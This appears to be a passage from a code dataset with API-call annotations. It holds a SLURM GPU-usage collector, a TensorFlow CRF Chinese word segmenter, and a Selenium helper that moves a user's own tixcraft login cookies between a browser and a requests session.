logging\n'), ((7076, 7142), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X_train', 'Y_train'], {'test_size': '(64)', 'random_state': '(666)'}), '(X_train, Y_train, test_size=64, random_state=666)\n', (7092, 7142), False, 'from sklearn.model_selection import train_test_split, StratifiedKFold\n'), ((6908, 6937), 'os.makedirs', 'os.makedirs', (['t'], {'exist_ok': '(True)'}), '(t, exist_ok=True)\n', (6919, 6937), False, 'import os\n'), ((1285, 1305), 'scipy.sparse.issparse', 'sparse.issparse', (['seq'], {}), '(seq)\n', (1300, 1305), False, 'from scipy import sparse\n'), ((2282, 2325), 'numpy.concatenate', 'np.concatenate', (['batch_scores.values'], {'axis': '(0)'}), '(batch_scores.values, axis=0)\n', (2296, 2325), True, 'import numpy as np\n'), ((3409, 3469), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ([], {'ngram_range': '(1, 2)', 'max_features': 'VOCAB_SIZE'}), '(ngram_range=(1, 2), max_features=VOCAB_SIZE)\n', (3424, 3469), False, 'from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n'), ((1389, 1415), 'numpy.zeros', 'np.zeros', (['(max_len - n, m)'], {}), '((max_len - n, m))\n', (1397, 1415), True, 'import numpy as np\n')] |
#!/usr/bin/python3
# author mhakala
import json
import re
import subprocess
import tempfile
import os
import xml.etree.cElementTree as ET
import argparse
import os.path
import time
import random
from datetime import datetime
from datetime import timedelta
import traceback
import configparser
import glob
def jobs_running():
    """Return the SLURM job ids currently active on this host.

    Queries ``squeue`` restricted to the short hostname of the local node
    and returns the job ids as a list of strings.
    """
    hostname = os.uname()[1].split('.')[0]
    out = subprocess.check_output(
        ['squeue', '-w', hostname, '-h', '-o', '%A']).decode()
    return out.split()
def pid2id(pid):
    """Map a process id to its SLURM job id via the cgroup hierarchy.

    Scans ``/proc/<pid>/cgroup`` for a slurm job path and returns the job
    id as a string, or None when the process is not in a SLURM job cgroup.
    """
    pattern = re.compile(r'.*slurm\/uid_.*\/job_(\d+)\/.*')
    with open('/proc/%s/cgroup' % pid) as cgroup_file:
        for line in cgroup_file:
            match = pattern.search(line)
            if match:
                return match.group(1)
    return None
# get needed slurm values for each running job on the node
def job_info(jobs, current):
    """Fill in CPU/GPU counts for each job via ``scontrol show job``.

    Single-node jobs get their 'ncpu' and 'ngpu' entries populated in
    *current*; multi-node jobs are removed from *current* entirely (their
    usage cannot be attributed to this node alone).  Returns *current*.
    """
    for jobid in jobs:
        info = subprocess.check_output(
            ['scontrol', '-o', 'show', 'job', jobid]).decode()
        cpu_match = re.search('NumCPUs=(\d+)', info)
        node_match = re.search('NumNodes=(\d+)', info)
        tres = re.search('TRES=(\S+)', info).group(1)
        n_gpus = 0
        for item in tres.split(','):
            parts = item.split('=')
            if parts[0] == 'gres/gpu:tesla':
                # A bare 'gres/gpu:tesla' entry means one GPU; otherwise
                # the count follows the '='.
                n_gpus = 1 if len(parts) == 1 else int(parts[-1])
        if int(node_match.group(1)) > 1:
            del current[jobid]
        else:
            current[jobid]['ngpu'] = n_gpus
            current[jobid]['ncpu'] = int(cpu_match.group(1))
    return current
def gpu_info(jobinfo):
    """Accumulate per-job GPU utilization/power/memory from ``nvidia-smi``.

    Parses the XML output of ``nvidia-smi -q -x`` and, for every GPU that
    a known job is using, adds its utilization share and power draw to the
    job's running totals and updates the memory maximum.  Jobs that were
    dropped from *jobinfo* (multi-node jobs) are skipped.  Returns the
    mutated *jobinfo* dict.
    """
    output = subprocess.check_output(['nvidia-smi', '-q', '-x']).decode()
    root = ET.fromstring(output)
    for gpu in root.findall('gpu'):
        procs = gpu.find('processes')
        mtot = 0.  # total memory (MiB) used on this GPU across processes
        jobid = None
        # Here we assume that multiple job id's cannot access the same
        # GPU
        for pi in procs.findall('process_info'):
            pid = pi.find('pid').text
            jobid = pid2id(pid)
            # Assume used_memory is of the form '1750 MiB'. Needs fixing
            # if the unit is anything but MiB.
            mtot += float(pi.find('used_memory').text.split()[0])
        util = gpu.find('utilization')
        # Here assume gpu utilization is of the form
        # '100 %'
        gutil = float(util.find('gpu_util').text.split()[0])
        # power_draw is of the form 35.25 W
        power = gpu.find('power_readings')
        gpwrdraw = float(power.find('power_draw').text.split()[0])
        # only update, if jobid not dropped (multinode jobs)
        # if a job is using multiple GPUs, code below should execute again
        if jobid in jobinfo.keys():
            if jobinfo[jobid]['ngpu'] != 0:
                # Dividing by ngpu yields the average utilization across
                # the job's GPUs once every GPU has been visited.
                jobinfo[jobid]['gpu_util'] += gutil/jobinfo[jobid]['ngpu']
                jobinfo[jobid]['gpu_power'] += gpwrdraw
                jobinfo[jobid]['gpu_mem_max'] = max(mtot,
                                                    jobinfo[jobid]['gpu_mem_max'])
    return jobinfo
def read_shm(dir_name):
    """Load every per-job JSON file from *dir_name* into a dict.

    *dir_name* is expected to end with '/'.  Keys are job ids (the file
    name minus directory and '.json'); values are the decoded payloads.
    """
    jobinfo = {}
    for fpath in glob.glob(dir_name + '*.json'):
        jobid = fpath.replace(dir_name, '').replace('.json', '')
        with open(fpath) as fp:
            jobinfo[jobid] = json.load(fp)
    return jobinfo
def write_shm(jobinfo, running_jobids, dir_path, max_age):
    """Persist per-job stats as JSON files and prune expired ones.

    Jobs that are still running and use at least one GPU get their stats
    (re)written to ``<dir_path><jobid>.json``; files whose recorded
    timestamp is older than *max_age* days are deleted.  Timestamps are
    '%Y-%m-%d %H:%M:%S' strings, which compare correctly lexicographically.
    """
    cutoff = (datetime.now() - timedelta(days=max_age)).strftime("%Y-%m-%d %H:%M:%S")
    for jobid, stats in jobinfo.items():
        fpath = dir_path + str(jobid) + '.json'
        if jobid in running_jobids and stats['ngpu'] != 0:
            with open(fpath, 'w') as fp:
                json.dump(stats, fp)
        elif stats['timestamp'] < cutoff:
            os.remove(fpath)
def dir_path(path):
    """argparse ``type=`` helper: accept *path* only if it is a directory.

    Raises argparse.ArgumentTypeError otherwise.
    """
    if not os.path.isdir(path):
        raise argparse.ArgumentTypeError("readable_dir:" +
                                         str(path) +
                                         " is not a valid path")
    return path
def main():
    """Collect one sample of per-job GPU stats and merge it into the
    on-disk JSON store.

    Intended to run once a minute (e.g. from cron): optionally sleeps a
    random 0-30 s to spread load, samples squeue/scontrol/nvidia-smi,
    averages with the previously stored step counts, then rewrites the
    per-job JSON files.  All exceptions are swallowed and appended to the
    log file so a single bad sample never kills the collector.

    NOTE(review): ``logfile`` is opened but never closed — relies on
    process exit; consider a ``with`` block.
    """
    start_time = time.time()
    parser = argparse.ArgumentParser()
    parser.add_argument('dir_path',
                        type=dir_path,
                        nargs='?',
                        default='/tmp/gpu_stats/',
                        help="The directory where a JSON for each job is stored")
    parser.add_argument('-n', '--nosleep',
                        help="Don't sleep at the beginning",
                        action="store_true")
    parser.add_argument('-l',
                        '--logfile',
                        help="Name of log file where any exceptions will be written to",
                        default='/tmp/gpustats.log')
    parser.add_argument('-m',
                        '--max-age',
                        type=int,
                        default=1,
                        help='The maximum time (in days) for which the gpu stats of a job will be stored')
    args = parser.parse_args()
    # Normalize to a trailing slash: read_shm/write_shm concatenate paths.
    if args.dir_path[-1] != '/':
        args.dir_path += '/'
    logfile = open(args.logfile, 'a+')
    try:
        # Random jitter so many nodes do not hammer the scheduler at once.
        if not args.nosleep:
            time.sleep(random.randint(0, 30))
        # initialize stats
        current = {}
        jobs = jobs_running()
        for job in jobs:
            current[job]={'gpu_util': 0, 'gpu_mem_max': 0, 'ngpu': 0,
                          'ncpu': 0, 'step': 1, 'gpu_power': 0,
                          'timestamp':
                          datetime.now().strftime("%Y-%m-%d %H:%M:%S")}
        # get current job info
        current = job_info(jobs, current)
        current = gpu_info(current)
        # running_jobids contains jobids of jobs that are running
        # if a jobid is not in this set,
        # then we don't need to write to the corresponding file
        running_jobids = set(current.keys())
        # combine with previous steps, calculate avgs and max
        prev = read_shm(args.dir_path)
        for job in jobs:
            if job in prev.keys():
                # Running average over 'step' samples for util and power;
                # running max for memory.
                n = prev[job]['step']
                current[job]['gpu_util'] = ( float(prev[job]['gpu_util'])*n+float(current[job]['gpu_util']) )/(n+1)
                current[job]['gpu_power'] = ( float(prev[job]['gpu_power'])*n+float(current[job]['gpu_power']) )/(n+1)
                current[job]['gpu_mem_max'] = max(float(prev[job]['gpu_mem_max']), float(current[job]['gpu_mem_max']))
                current[job]['step'] = n+1
        for job in prev.keys():
            if job not in jobs:
                # it must be a job that is no longer running
                current[job] = prev[job]
        # write json
        write_shm(current, running_jobids, args.dir_path, args.max_age)
    except Exception as e:
        logfile.write(traceback.format_exc())
    end_time = time.time()
    if end_time - start_time > 55.0:
        logfile.write("WARNING: runtime was longer than expected at " +
                      str(end_time - start_time) +
                      " seconds\n")
# Run the collector only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| [
"subprocess.check_output",
"traceback.format_exc",
"os.uname",
"argparse.ArgumentParser",
"xml.etree.cElementTree.fromstring",
"json.dump",
"os.remove",
"datetime.datetime.now",
"os.path.isdir",
"datetime.timedelta",
"time.time",
"random.randint",
"glob.glob",
"re.search"
] | [((1741, 1762), 'xml.etree.cElementTree.fromstring', 'ET.fromstring', (['output'], {}), '(output)\n', (1754, 1762), True, 'import xml.etree.cElementTree as ET\n'), ((3161, 3191), 'glob.glob', 'glob.glob', (["(dir_name + '*.json')"], {}), "(dir_name + '*.json')\n", (3170, 3191), False, 'import glob\n'), ((3867, 3886), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (3880, 3886), False, 'import os\n'), ((4125, 4136), 'time.time', 'time.time', ([], {}), '()\n', (4134, 4136), False, 'import time\n'), ((4150, 4175), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4173, 4175), False, 'import argparse\n'), ((6873, 6884), 'time.time', 'time.time', ([], {}), '()\n', (6882, 6884), False, 'import time\n'), ((982, 1017), 're.search', 're.search', (['"""NumCPUs=(\\\\d+)"""', 'output'], {}), "('NumCPUs=(\\\\d+)', output)\n", (991, 1017), False, 'import re\n'), ((1092, 1128), 're.search', 're.search', (['"""NumNodes=(\\\\d+)"""', 'output'], {}), "('NumNodes=(\\\\d+)', output)\n", (1101, 1128), False, 'import re\n'), ((3438, 3452), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3450, 3452), False, 'from datetime import datetime\n'), ((3455, 3478), 'datetime.timedelta', 'timedelta', ([], {'days': 'max_age'}), '(days=max_age)\n', (3464, 3478), False, 'from datetime import timedelta\n'), ((648, 701), 're.search', 're.search', (['""".*slurm\\\\/uid_.*\\\\/job_(\\\\d+)\\\\/.*"""', 'line'], {}), "('.*slurm\\\\/uid_.*\\\\/job_(\\\\d+)\\\\/.*', line)\n", (657, 701), False, 'import re\n'), ((1669, 1720), 'subprocess.check_output', 'subprocess.check_output', (["['nvidia-smi', '-q', '-x']"], {}), "(['nvidia-smi', '-q', '-x'])\n", (1692, 1720), False, 'import subprocess\n'), ((892, 955), 'subprocess.check_output', 'subprocess.check_output', (["['scontrol', '-o', 'show', 'job', job]"], {}), "(['scontrol', '-o', 'show', 'job', job])\n", (915, 955), False, 'import subprocess\n'), ((1034, 1066), 're.search', 're.search', 
(['"""TRES=(\\\\S+)"""', 'output'], {}), "('TRES=(\\\\S+)', output)\n", (1043, 1066), False, 'import re\n'), ((3729, 3758), 'json.dump', 'json.dump', (['jobinfo[jobid]', 'fp'], {}), '(jobinfo[jobid], fp)\n', (3738, 3758), False, 'import json\n'), ((3822, 3838), 'os.remove', 'os.remove', (['fpath'], {}), '(fpath)\n', (3831, 3838), False, 'import os\n'), ((5220, 5241), 'random.randint', 'random.randint', (['(0)', '(30)'], {}), '(0, 30)\n', (5234, 5241), False, 'import random\n'), ((6833, 6855), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (6853, 6855), False, 'import traceback\n'), ((5550, 5564), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5562, 5564), False, 'from datetime import datetime\n'), ((428, 438), 'os.uname', 'os.uname', ([], {}), '()\n', (436, 438), False, 'import os\n')] |
""" 参考自https://github.com/bojone/crf/ """
import tensorflow as tf
k = tf.keras
kl = tf.keras.layers
K = tf.keras.backend
from sklearn.model_selection import train_test_split
import numpy as np
import re
from tqdm import tqdm
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
class CRF(kl.Layer):
    """Pure-Keras implementation of a linear-chain CRF loss layer.

    The CRF layer is essentially a loss-computation layer with a trainable
    transition matrix, so it is only used during training; decoding at
    prediction time is done separately (e.g. with Viterbi).
    """
    def __init__(self, ignore_last_label=False, lr_mult=1., **kwargs):
        """ignore_last_label: whether the last label acts as a mask label.

        lr_mult: learning-rate multiplier applied to the transition matrix.
        """
        super().__init__(**kwargs)
        self.ignore_last_label = 1 if ignore_last_label else 0
        self.lr_mult = lr_mult
    def build(self, input_shape):
        self.num_labels = input_shape[-1] - self.ignore_last_label
        self._trans: tf.Variable = self.add_weight(name='crf_trans',
                                                   shape=(self.num_labels, self.num_labels),
                                                   initializer='glorot_uniform',
                                                   trainable=True)
        # Store the variable scaled down so that trans() (= _trans * lr_mult)
        # keeps the initial values while the gradient on _trans is amplified.
        self._trans.assign(self._trans / self.lr_mult)
        self.trans = lambda: self._trans * self.lr_mult
    def get_weights(self):
        # Report the effective (rescaled) transition weights.
        weights = super().get_weights()
        return [w * self.lr_mult for w in weights]
    def log_norm_step(self, inputs, states):
        """One recursion step of the normalization factor Z (in log space).

        Key points: computed recursively; logsumexp avoids overflow.
        Trick: expand_dims is used to align the tensors.
        """
        inputs, mask = inputs[:, :-1], inputs[:, -1:]
        states = K.expand_dims(states[0], 2)  # (batch_size, output_dim, 1)
        trans = K.expand_dims(self.trans(), 0)  # (1, output_dim, output_dim)
        outputs = tf.math.reduce_logsumexp(states + trans, 1)  # (batch_size, output_dim)
        outputs = outputs + inputs
        outputs = mask * outputs + (1 - mask) * states[:, :, 0]
        return outputs, [outputs]
    def path_score(self, inputs, labels):
        """Relative (unnormalized) log-score of the target path.

        Key points: per-label emission score plus transition score.
        Trick: multiplying the predictions by the one-hot targets extracts
        the scores along the target path.
        """
        point_score = K.sum(K.sum(inputs * labels, 2), 1, keepdims=True)  # per-label score
        labels1 = K.expand_dims(labels[:, :-1], 3)
        labels2 = K.expand_dims(labels[:, 1:], 2)
        labels = labels1 * labels2  # two shifted label tensors select the target transitions from the matrix
        trans = K.expand_dims(K.expand_dims(self.trans(), 0), 0)
        trans_score = K.sum(K.sum(trans * labels, [2, 3]), 1, keepdims=True)
        return point_score + trans_score  # sum of both parts
    def call(self, inputs):  # the CRF itself does not change its input; it only carries a loss
        return inputs
    def loss(self, y_true, y_pred):  # y_true must be one-hot encoded
        if self.ignore_last_label:
            mask = 1 - y_true[:, :, -1:]
        else:
            mask = K.ones_like(y_pred[:, :, :1])
        y_true, y_pred = y_true[:, :, :self.num_labels], y_pred[:, :, :self.num_labels]
        path_score = self.path_score(y_pred, y_true)  # numerator (in log space)
        init_states = [y_pred[:, 0]]  # initial state
        y_pred = K.concatenate([y_pred, mask])
        log_norm, _, _ = K.rnn(self.log_norm_step, y_pred[:, 1:], init_states)  # Z vector (in log space)
        log_norm = tf.math.reduce_logsumexp(log_norm, 1, keepdims=True)  # Z (in log space)
        return log_norm - path_score  # i.e. log(numerator / denominator)
    def accuracy(self, y_true, y_pred):
        """Per-frame accuracy shown during training, excluding masked frames."""
        mask = 1 - y_true[:, :, -1] if self.ignore_last_label else None
        y_true, y_pred = y_true[:, :, :self.num_labels], y_pred[:, :, :self.num_labels]
        isequal = K.equal(K.argmax(y_true, 2), K.argmax(y_pred, 2))
        isequal = K.cast(isequal, 'float32')
        # Bug fix: use `is None`; `mask == None` asks TensorFlow for an
        # element-wise comparison instead of testing the None sentinel.
        if mask is None:
            return K.mean(isequal)
        else:
            return K.sum(isequal * mask) / K.sum(mask)
def max_in_dict(d):
    """Return the (key, value) pair with the largest value in non-empty *d*.

    On ties the first key in insertion order wins, matching the original
    strict `>` comparison loop.
    """
    return max(d.items(), key=lambda kv: kv[1])
def viterbi(nodes, trans):
    """Viterbi decoding, same as in the HMM version earlier.

    nodes: one {tag: log-score} dict per position.
    trans: {two-char tag pair: transition score} dict.
    Returns the best (path, score) pair via max_in_dict.
    """
    paths = dict(nodes[0])  # survivor paths start as the first position's tags
    for layer in nodes[1:]:  # walk the remaining positions
        previous, paths = paths, {}
        for tag, emit in layer.items():  # every candidate tag at this position
            # score every extension of the surviving paths by this tag
            scored = {path + tag: emit + score + trans[path[-1] + tag]
                      for path, score in previous.items()}
            winner = max(scored, key=scored.get)  # keep only the best extension
            paths[winner] = scored[winner]
    return max_in_dict(paths)
def cut(s, trans, char2id):  # segmentation function, essentially the same as the HMM version
    """Segment sentence *s* into words using the trained model plus Viterbi.

    trans: tag-transition score dict; char2id: char -> id mapping.
    """
    if not s:  # empty string: nothing to segment
        return []
    # Map characters to ids. The preprocessed corpus contains no spaces, so a
    # space is simply given the id of the full-width period.
    ids = [char2id.get(ch, 0) if ch != ' ' else char2id[u'。'] for ch in s]
    probas = model.predict(np.array([ids]))[0]  # [n, 5]
    nodes = [dict(zip('sbme', row)) for row in probas[:, :4]]  # keep only 4 tags; the fifth is the mask
    nodes[0] = {t: v for t, v in nodes[0].items() if t in 'bs'}  # first char can only be tagged b or s
    nodes[-1] = {t: v for t, v in nodes[-1].items() if t in 'es'}  # last char can only be tagged e or s
    tags = viterbi(nodes, trans)[0]
    words = [s[0]]
    for ch, tag in zip(s[1:], tags[1:]):
        if tag in 'bs':  # tag starts a new word
            words.append(ch)
        else:  # continue the current word
            words[-1] += ch
    return words
class Evaluate(k.callbacks.Callback):
    """Keras callback that snapshots the CRF transition matrix after every
    training batch so its evolution can later be rendered as an animation.
    """
    def __init__(self, tag2id, char2id):
        self.highest = 0.  # best validation accuracy seen so far
        self.tag2id = tag2id  # tag ('sbme') -> id mapping
        self.char2id = char2id  # char -> id mapping
        self.history = []  # recorded 4x4 transition matrices, one per batch
    def on_train_batch_end(self, batch, logs=None):
        A = self.model.get_layer('crf').get_weights()[0][:4, :4]  # latest transition matrix from the model being trained
        self.history.append(A)
    # def on_epoch_end(self, epoch, logs=None):
    #     A = self.model.get_weights()[-1][:4, :4] # 从训练模型中取出最新得到的转移矩阵
    #     trans = {}
    #     for i in 'sbme':
    #         for j in 'sbme':
    #             trans[i + j] = A[self.tag2id[i], self.tag2id[j]]
    #     right = 0.
    #     total = 0.
    #     for s in tqdm(iter(valid_sents), desc=u'验证模型中'):
    #         result = cut(''.join(s), trans, self.char2id)
    #         total += len(set(s))
    #         right += len(set(s) & set(result)) # 直接将词集的交集作为正确数。该指标比较简单,
    #         # 也许会导致估计偏高。读者可以考虑自定义指标
    #     acc = right / total
    #     if acc > self.highest:
    #         self.highest = acc
    #     print('val acc: %s, highest: %s' % (acc, self.highest))
    def show_anime(self, save_path='gif/crf.gif'):
        """Render the recorded transition matrices as an animated heatmap,
        save it as a GIF (writer='imagemagick') and show the figure."""
        fig, ax = plt.subplots()
        fig.set_tight_layout(True)
        ax: plt.Axes
        A = self.history[0]
        # initial frame: heatmap of the first recorded matrix
        c = ax.pcolor(A, cmap='RdBu_r', vmin=A.min(), vmax=A.max(),
                      edgecolors='w', linewidths=30)
        ax.set_xticks(np.arange(4) + 0.5)
        ax.set_yticks(np.arange(4) + 0.5)
        ax.set_xticklabels(list('sbme'))
        ax.set_yticklabels(list('sbme'))
        for i in range(4):
            for j in range(4):
                text = ax.text(j + 0.5, i + 0.5,
                               f'{A[i, j]:^4.2f}',
                               ha="center", va="center", color="w")
        def update(t):
            # redraw the heatmap for the t-th recorded matrix
            ax.cla()
            ax.set_title(f'iter {t}')
            ax.set_xticks(np.arange(4) + 0.5)
            ax.set_yticks(np.arange(4) + 0.5)
            ax.set_xticklabels(list('sbme'))
            ax.set_yticklabels(list('sbme'))
            A = self.history[t]
            c = ax.pcolor(A, cmap='RdBu_r', vmin=A.min(), vmax=A.max(),
                          edgecolors='w', linewidths=30)
            for i in range(4):
                for j in range(4):
                    text = ax.text(j + 0.5, i + 0.5,
                                   f'{A[i, j]:^4.2f}',
                                   ha="center", va="center", color="w")
        anim = FuncAnimation(fig, update, frames=len(self.history), interval=100)
        anim.save(save_path, writer='imagemagick', fps=5)
        plt.show()
if __name__ == "__main__":
    # Require a GPU and enable memory growth so TF does not grab all VRAM.
    physical_devices = tf.config.experimental.list_physical_devices('GPU')
    assert len(physical_devices) > 0, "Not enough GPU hardware devices available"
    tf.config.experimental.set_memory_growth(physical_devices[0], True)
    # Load the MSR segmentation corpus, one sentence per line.
    sents = []
    with open('CRF/msr_training.utf8', 'r') as f:
        for line in f.readlines():
            sents.append(line.strip())
    sents = [re.split(' +', s) for s in sents]  # words are separated by spaces
    sents = [[w for w in s if w] for s in sents]  # drop empty strings
    np.random.shuffle(sents)  # shuffle the corpus before splitting off a validation set
    chars = {}  # character frequency table
    for s in sents:
        for c in ''.join(s):
            if c in chars:
                chars[c] += 1
            else:
                chars[c] = 1
    # filter out low-frequency characters
    min_count = 2
    chars = {i: j for i, j in chars.items() if j >= min_count}
    id2char = {i + 1: j for i, j in enumerate(chars)}  # id -> char mapping
    char2id = {j: i for i, j in id2char.items()}  # char -> id mapping
    id2tag = {0: 's', 1: 'b', 2: 'm', 3: 'e'}  # mapping between the (sbme) tags and ids
    tag2id = {j: i for i, j in id2tag.items()}
    train_sents, valid_sents = train_test_split(sents, test_size=0.05)
    batch_size = 128
    def train_generator():
        # Endless generator of (char-id matrix, one-hot tag tensor) batches.
        while True:
            X, Y = [], []
            for i, s in enumerate(train_sents):  # iterate over the sentences
                sx, sy = [], []
                for w in s:  # iterate over the words of the sentence
                    sx.extend([char2id.get(c, 0) for c in w])  # iterate over the chars of the word
                    if len(w) == 1:
                        sy.append(0)  # tag for a single-char word
                    elif len(w) == 2:
                        sy.extend([1, 3])  # tags for a two-char word
                    else:
                        sy.extend([1] + [2] * (len(w) - 2) + [3])  # tags for words longer than two chars
                X.append(sx)
                Y.append(sy)
                if len(X) == batch_size or i == len(train_sents) - 1:  # once a full batch is collected
                    maxlen = max([len(x) for x in X])  # longest sentence in the batch
                    X = [x + [0] * (maxlen - len(x)) for x in X]  # pad with zeros
                    Y = [y + [4] * (maxlen - len(y)) for y in Y]  # pad with the fifth (mask) tag
                    yield np.array(X), tf.keras.utils.to_categorical(Y, 5)
                    X, Y = [], []
    embedding_size = 128
    sequence = kl.Input(shape=(None,), dtype='int32')  # input layer with variable sequence length
    embedding = kl.Embedding(len(chars) + 1, embedding_size)(sequence)  # mask_zero=True removed
    cnn = kl.Conv1D(128, 3, activation='relu', padding='same')(embedding)
    cnn = kl.Conv1D(128, 3, activation='relu', padding='same')(cnn)
    cnn = kl.Conv1D(128, 3, activation='relu', padding='same')(cnn)  # stack of 3 CNN layers
    crf = CRF(True, lr_mult=100.)  # CRF layer; True auto-masks the last label, lr_mult boosts its learning rate 100x
    tag_score = kl.Dense(5)(cnn)  # 5-way classification; the fifth label is used for masking
    tag_score = crf(tag_score)  # wrap the raw tag scores
    model = k.Model(inputs=sequence, outputs=tag_score)
    model.summary()
    model.compile(loss=crf.loss,  # use the loss provided by the CRF layer
                  optimizer=k.optimizers.Adam(0.001),
                  metrics=[crf.accuracy]  # use the accuracy provided by the CRF layer
                  )
    evaluator = Evaluate(tag2id, char2id)
    model.fit_generator(train_generator(),
                        steps_per_epoch=100,
                        epochs=1,
                        callbacks=[evaluator])  # train with evaluator attached as a callback
    A = model.get_layer('crf').get_weights()[0][:4, :4]  # :4 drops the transition scores of the mask label
    trans = {}
    for i in 'sbme':
        for j in 'sbme':
            trans[i + j] = A[tag2id[i], tag2id[j]]
    right = 0.
    total = 0.
    # Show segmentations of a few validation sentences.
    for s in range(5):
        s = valid_sents[s]
        result = cut(''.join(s), trans, char2id)
        print(''.join(s), '\n', result)
    evaluator.show_anime()
| [
"re.split",
"tensorflow.keras.utils.to_categorical",
"matplotlib.pyplot.show",
"tensorflow.config.experimental.set_memory_growth",
"sklearn.model_selection.train_test_split",
"numpy.array",
"tensorflow.config.experimental.list_physical_devices",
"tensorflow.math.reduce_logsumexp",
"matplotlib.pyplot... | [((7282, 7333), 'tensorflow.config.experimental.list_physical_devices', 'tf.config.experimental.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (7326, 7333), True, 'import tensorflow as tf\n'), ((7416, 7483), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (7456, 7483), True, 'import tensorflow as tf\n'), ((7726, 7750), 'numpy.random.shuffle', 'np.random.shuffle', (['sents'], {}), '(sents)\n', (7743, 7750), True, 'import numpy as np\n'), ((8258, 8297), 'sklearn.model_selection.train_test_split', 'train_test_split', (['sents'], {'test_size': '(0.05)'}), '(sents, test_size=0.05)\n', (8274, 8297), False, 'from sklearn.model_selection import train_test_split\n'), ((1581, 1624), 'tensorflow.math.reduce_logsumexp', 'tf.math.reduce_logsumexp', (['(states + trans)', '(1)'], {}), '(states + trans, 1)\n', (1605, 1624), True, 'import tensorflow as tf\n'), ((2900, 2952), 'tensorflow.math.reduce_logsumexp', 'tf.math.reduce_logsumexp', (['log_norm', '(1)'], {'keepdims': '(True)'}), '(log_norm, 1, keepdims=True)\n', (2924, 2952), True, 'import tensorflow as tf\n'), ((5971, 5985), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5983, 5985), True, 'import matplotlib.pyplot as plt\n'), ((7221, 7231), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7229, 7231), True, 'import matplotlib.pyplot as plt\n'), ((7621, 7638), 're.split', 're.split', (['""" +"""', 's'], {}), "(' +', s)\n", (7629, 7638), False, 'import re\n'), ((6189, 6201), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6198, 6201), True, 'import numpy as np\n'), ((6227, 6239), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6236, 6239), True, 'import numpy as np\n'), ((6600, 6612), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6609, 6612), True, 'import numpy as np\n'), ((6640, 6652), 'numpy.arange', 'np.arange', (['(4)'], 
{}), '(4)\n', (6649, 6652), True, 'import numpy as np\n'), ((9086, 9097), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (9094, 9097), True, 'import numpy as np\n'), ((9099, 9134), 'tensorflow.keras.utils.to_categorical', 'tf.keras.utils.to_categorical', (['Y', '(5)'], {}), '(Y, 5)\n', (9128, 9134), True, 'import tensorflow as tf\n')] |
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.by import By
from selenium import webdriver
import requests
def login():
    """Open a Chrome window on the tixcraft login page, block (up to ten
    minutes) until the user has logged in, and return the session cookies."""
    browser = webdriver.Chrome()
    browser.implicitly_wait(20)
    browser.get("https://tixcraft.com/login")
    # The user-name element only appears once the login has succeeded.
    logged_in = EC.visibility_of_element_located((By.XPATH, "//*[@class='user-name']"))
    WebDriverWait(browser, 600).until(logged_in)
    cookies = browser.get_cookies()
    browser.quit()
    return cookies
def user_verify(driver, url):
    """Navigate to *url* and poll until the page leaves "ticket/verify".

    Any JavaScript alert shown during verification is accepted so the page
    can proceed. Returns the URL reached after verification.
    """
    driver.get(url)
    url = driver.current_url
    while "ticket/verify" in url:
        try:
            url = driver.current_url
            WebDriverWait(driver, 2).until(EC.alert_is_present())
            # switch_to.alert replaces the deprecated switch_to_alert()
            alert = driver.switch_to.alert
            alert.accept()
        except Exception:
            # No alert within the timeout (or it vanished); keep polling.
            pass
    return url
def session_to_driver(session):
    """Copy the cookies from a requests *session* into a fresh Chrome driver."""
    driver = webdriver.Chrome()
    # A page must be loaded before cookies for the domain can be added.
    driver.get("https://tixcraft.com")
    for cookie_name, cookie_value in session.cookies.get_dict().items():
        driver.add_cookie({"name": cookie_name, "value": cookie_value})
    return driver
def driver_to_session(driver):
    """Copy the cookies from a Selenium *driver* into a new requests Session."""
    session = requests.Session()
    for cookie in driver.get_cookies():
        session.cookies.set(cookie["name"], cookie["value"])
    return session
| [
"requests.Session",
"selenium.webdriver.Chrome",
"selenium.webdriver.support.wait.WebDriverWait",
"selenium.webdriver.support.expected_conditions.alert_is_present",
"selenium.webdriver.support.expected_conditions.visibility_of_element_located"
] | [((242, 260), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (258, 260), False, 'from selenium import webdriver\n'), ((972, 990), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (988, 990), False, 'from selenium import webdriver\n'), ((1252, 1270), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1268, 1270), False, 'import requests\n'), ((383, 454), 'selenium.webdriver.support.expected_conditions.visibility_of_element_located', 'EC.visibility_of_element_located', (['(By.XPATH, "//*[@class=\'user-name\']")'], {}), '((By.XPATH, "//*[@class=\'user-name\']"))\n', (415, 454), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((341, 367), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['driver', '(600)'], {}), '(driver, 600)\n', (354, 367), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((741, 762), 'selenium.webdriver.support.expected_conditions.alert_is_present', 'EC.alert_is_present', ([], {}), '()\n', (760, 762), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((710, 734), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['driver', '(2)'], {}), '(driver, 2)\n', (723, 734), False, 'from selenium.webdriver.support.wait import WebDriverWait\n')] |
from rest_framework.views import APIView
from rest_framework.response import Response
